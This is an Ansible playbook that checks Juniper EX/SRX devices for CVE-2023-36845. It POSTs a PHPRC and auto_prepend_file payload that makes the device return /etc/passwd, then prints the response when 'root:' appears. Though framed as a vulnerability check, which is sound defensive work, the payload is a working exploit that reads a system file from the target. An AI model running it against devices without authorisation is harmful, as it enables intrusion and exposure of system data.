- name: CVE-2023-36845 Juniper Junos OS EX Series and SRX Series PHP External Variable Modification Vulnerability
  gather_facts: false
  hosts: all
  vars:
    uri: "?PHPRC=/dev/fd/0"
    pattern1: 'root:'
    ports:
      - 80
      - 443
  tasks:
    - name: Assess vulnerable condition
      ansible.builtin.uri:
        url: "http{{ (item | int == 443) | ternary('s', '') }}://{{ inventory_hostname }}/{{ uri }}"
        method: POST
        timeout: 2
        status_code: 200
        return_content: true
        force: true
        validate_certs: false
        body_format: form-urlencoded
        body:
          auto_prepend_file: /etc/passwd
      loop: "{{ ports }}"
      register: response
      ignore_errors: true
      delegate_to: 127.0.0.1

    - name: Examine vulnerable condition response
      ansible.builtin.debug:
        msg: "Device {{ inventory_hostname }} is potentially vulnerable with 'root:' found in response content: {{ response.content }}"
      when:
        - response is defined
        - response.status == 200
        - response.content | regex_search(pattern1)
